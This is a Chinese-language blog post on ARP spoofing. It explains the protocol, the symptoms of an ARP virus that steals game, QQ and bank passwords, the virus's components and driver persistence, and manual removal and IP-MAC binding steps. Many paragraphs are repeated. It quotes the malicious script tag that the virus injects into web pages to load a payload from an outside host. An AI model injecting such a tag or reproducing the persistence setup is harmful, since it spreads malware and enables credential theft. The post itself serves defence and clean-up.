什么是ARP?
ARP(Address Resolution Protocol,地址解析协议)是一个位于TCP/IP协议栈中的低层协议,负责将某个IP地址解析成对应的MAC地址。
ARP(Address Resolution Protocol,地址解析协议)是一个位于TCP/IP协议栈中的低层协议,负责将某个IP地址解析成对应的MAC地址。
什么是ARP欺骗?
从影响网络连接通畅的方式来看,ARP欺骗分为二种,一种是对路由器ARP表的欺骗;另一种是对内网PC的网关欺骗。
第一种ARP欺骗的原理是——截获网关数据。它通知路由器一系列错误的内网MAC地址,并按照一定的频率不断进行,使真实的地址信息无法通过更新保存在路由器中,结果路由器的所有数据只能发送给错误的MAC地址,造成正常PC无法收到信息。第二种ARP欺骗的原理是——伪造网关。它的原理是建立假网关,让被它欺骗的PC向假网关发数据,而不是通过正常的路由器途径上网。在PC看来,就是上不了网了,“网络掉线了”。
从影响网络连接通畅的方式来看,ARP欺骗分为二种,一种是对路由器ARP表的欺骗;另一种是对内网PC的网关欺骗。
第一种ARP欺骗的原理是——截获网关数据。它通知路由器一系列错误的内网MAC地址,并按照一定的频率不断进行,使真实的地址信息无法通过更新保存在路由器中,结果路由器的所有数据只能发送给错误的MAC地址,造成正常PC无法收到信息。第二种ARP欺骗的原理是——伪造网关。它的原理是建立假网关,让被它欺骗的PC向假网关发数据,而不是通过正常的路由器途径上网。在PC看来,就是上不了网了,“网络掉线了”。
ARP欺骗***的中毒现象表现为:使用校园网时会突然掉线,过一段时间后又会恢复正常。比如客户端状态频频变红,用户频繁断网,IE浏览器频繁出错,以及一些常用软件出现故障等。如果校园网是通过身份认证上网的,会突然出现可认证,但不能上网的现象(无法ping通网关),重启机器或在MS-DOS窗口下运行命令arp -d后,又可恢复上网。ARP欺骗***只需成功感染一台电脑,就可能导致整个局域网都无法上网,严重的甚至可能带来整个网络的瘫痪。该***发作时除了会导致同一局域网内的其他用户上网出现时断时续的现象外,还会窃取用户密码。如盗取QQ密码、盗取各种网络游戏密码和账号去做金钱交易,盗窃网上银行账号来做非法交易活动等,这是***的惯用伎俩,给用户造成了很大的不便和巨大的经济损失。
1. 通过网页漏洞传播:该病毒通过植入网站上的一句JS脚本,导致有XML等漏洞的机器中招,成为此ARP病毒的传播源
2.ARP***篡改局域网数据包,一台电脑中招,局域网内的所有用户均遭殃:该病毒在整个局域网用户上网的网页中增加"<scrīpt src=http://9166.biz/w.js></scrīpt>"等内容,从而使局域网内有XML漏洞的电脑同时感染此病毒。
可用360安全卫士的专杀工具。使用360安全卫士勤打系统补丁,就不会感染此***病毒,防患于未然。
可用360安全卫士的专杀工具。使用360安全卫士勤打系统补丁,就不会感染此***病毒,防患于未然。
病毒的组件
病毒样本有三个组件构成:
%windows%\SYSTEM32\LOADHW.EXE (108,386 bytes) ….. ”病毒组件释放者”
%windows%\System32\drivers\npf.sys (119,808 bytes) ….. ”发ARP欺骗包的驱动程序”
%windows%\System32\msitinit.dll (39,952 bytes) …”命令驱动程序发ARP欺骗包的控制者”
病毒运作基理:
1.LOADHW.EXE 执行时会释放两个组件npf.sys 和msitinit.dll .
LOADHW.EXE释放组件后即终止运行.
注意: 病毒假冒成winPcap的驱动程序,并提供winPcap的功能. 客户若原先装有winPcap,
npf.sys将会被病毒文件覆盖掉.
2.随后msitinit.dll将npf.sys注册(并监视)为内核级驱动设备: "NetGroup Packet Filter Driver"
msitinit.dll 还负责发送指令来操作驱动程序npf.sys (如发送APR欺骗包, 抓包, 过滤包等)
以下从病毒代码中提取得服务相关值:
BinaryPathName = "system32\drivers\npf.sys"
StartType = SERVICE_AUTO_START
ServiceType = SERVICE_KERNEL_DRIVER
DesiredAccess = SERVICE_ALL_ACCESS
DisplayName = "NetGroup Packet Filter Driver"
ServiceName = "Npf"
3. npf.sys 负责监护msitinit.dll. 并将LOADHW.EXE注册为自启动程序:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
dwMyTest =LOADHW.EXE
注: 由于该项位于RunOnce下,该注册表启动项在每次执行后,即会被系统自动删除.
Part3. 反病毒应急响应解决方案
如何检查和处理“ ARP 欺骗”***的方法
检查本机的“ ARP 欺骗”***染毒进程
同时按住键盘上的“ CTRL ”和“ ALT ”键再按“ DEL ”键,选择“任务管理器”,点选“进程”标签。察看其中是否有一个名为“ MIR0.dat ”的进程。如果有,则说明已经中毒。
按以下顺序删除病毒组件
1) 删除 ”病毒组件释放者”
%windows%\SYSTEM32\LOADHW.EXE (本机没找到)
2) 删除 ”发ARP欺骗包的驱动程序” (兼 “病毒守护程序”)
%windows%\System32\drivers\npf.sys
a. 在设备管理器中, 单击”查看”-->”显示隐藏的设备”
b. 在设备树结构中,打开”非即插即用….”
c. 找到” NetGroup Packet Filter Driver” ,若没找到,请先刷新设备列表
d. 右键点击” NetGroup Packet Filter Driver” 菜单,并选择”卸载”.
e. 重启windows系统,
f. 删除%windows%\System32\drivers\npf.sys
3) 删除 ”命令驱动程序发ARP欺骗包的控制者”
%windows%\System32\msitinit.dll (本机没找到)
2. 删除以下”病毒的假驱动程序”的注册表服务项:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Npf
重新启动后,%windows%\System32\drivers\npf.sys 文件依然存在。晕。
防御性的办法:
可以建立一批处理文件,绑定IP和MAC,最好在机器和路由器中都绑定。
@echo off
arp -d
arp -s IP MAC
保存为:rarp.bat。
运行批处理文件将这个批处理文件拖到“Windows→开始→程序→启动”中,如果需要立即生效,请运行此文件。
注意:以上配置需要在网络正常时进行。没有彻底的解决办法,只能先这样搞下。
运行批处理文件将这个批处理文件拖到“Windows→开始→程序→启动”中,如果需要立即生效,请运行此文件。
注意:以上配置需要在网络正常时进行。没有彻底的解决办法,只能先这样搞下。
内网有些机器还是断断续续不能上网,于是马上找原因,使用arp -a看到自己网关的MAC地址变成了和内网一机器的MAC地址相同,于是断定内网有机器中了ARP网关欺骗型病毒。(前提是知道网关的正确的MAC地址,可以通过在可以正常上网的机器上,使用arp -a命令查看网关的MAC地址,通过对比发现网关的MAC地址被修改。)
在使用“***杀客”查杀病毒时候,发现有VKTServ病毒,上网查了一下这个病毒,没想到竟然有所发现,它就是使得内网机器的网络时断时续的罪魁祸首。马上参照别人的方法,综合自己的经验,查杀如下:
1.进入安全模式,在“服务”里面将VKTServ服务禁用。
2.在c:\windows\system32\vktserv.exe下,将VKTServ.exe文件删除。
3.在CMD下,使用 sc delete vtkserv 命令,删除VKTServ服务。
4.用“VKTServ”关键字搜索注册表,将搜索到的键值全部删除。
5.再用“VKTServ”关键字,搜索WINDOWS目录,确认没有这个文件的其他病毒了。
重新启动后,一切OK拉。天下太平了,用这个方法查杀了两台机器的病毒。
在使用“***杀客”查杀病毒时候,发现有VKTServ病毒,上网查了一下这个病毒,没想到竟然有所发现,它就是使得内网机器的网络时断时续的罪魁祸首。马上参照别人的方法,综合自己的经验,查杀如下:
1.进入安全模式,在“服务”里面将VKTServ服务禁用。
2.在c:\windows\system32\vktserv.exe下,将VKTServ.exe文件删除。
3.在CMD下,使用 sc delete vtkserv 命令,删除VKTServ服务。
4.用“VKTServ”关键字搜索注册表,将搜索到的键值全部删除。
5.再用“VKTServ”关键字,搜索WINDOWS目录,确认没有这个文件的其他病毒了。
重新启动后,一切OK拉。天下太平了,用这个方法查杀了两台机器的病毒。
没想到天下并没有想象的太平,内网还是出现同样现象,于是继续找原因。npf.sys又引起了我的怀疑,综合网上的杀毒方法和自己的摸索,总算好了。
npf 或 npf.sys ,该病毒通常有三个文件loadhw.exe,msitinit.dll,npf.sys,前两个一般的杀毒软件都可删除。npf.sys是该病毒主要文件,病毒修改注册表创建系统服务NPF实现自启动,运行后执行ARP欺骗,在病毒机器1伪造MAC地址时,不停地向各个机器发送ARP包堵塞网络,使得网络传输数据越来越慢,并且通过伪掉线来使用户重新登陆游戏,这样它就可以截取局域网内所有用户登陆游戏时的信息数据。该病毒往往造成网络堵塞,严重时造成机器蓝屏。
在本地机器上并没有查到前两个文件,最后一个文件找到了。于是开始杀毒。
首先进入注册表删除
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Npf服务。
同时删除
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY-NPF
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY-NPF
删除这两个键时,会提示无法删除,这是因为没有权限,于是右键,权限,设置为everyone控制,删除,OK!
再去c:\windows\sysytem32\drivers,删除npf文件。
npf 或 npf.sys ,该病毒通常有三个文件loadhw.exe,msitinit.dll,npf.sys,前两个一般的杀毒软件都可删除。npf.sys是该病毒主要文件,病毒修改注册表创建系统服务NPF实现自启动,运行后执行ARP欺骗,在病毒机器1伪造MAC地址时,不停地向各个机器发送ARP包堵塞网络,使得网络传输数据越来越慢,并且通过伪掉线来使用户重新登陆游戏,这样它就可以截取局域网内所有用户登陆游戏时的信息数据。该病毒往往造成网络堵塞,严重时造成机器蓝屏。
在本地机器上并没有查到前两个文件,最后一个文件找到了。于是开始杀毒。
首先进入注册表删除
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Npf服务。
同时删除
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY-NPF
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY-NPF
删除这两个键时,会提示无法删除,这是因为没有权限,于是右键,权限,设置为everyone控制,删除,OK!
再去c:\windows\sysytem32\drivers,删除npf文件。
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
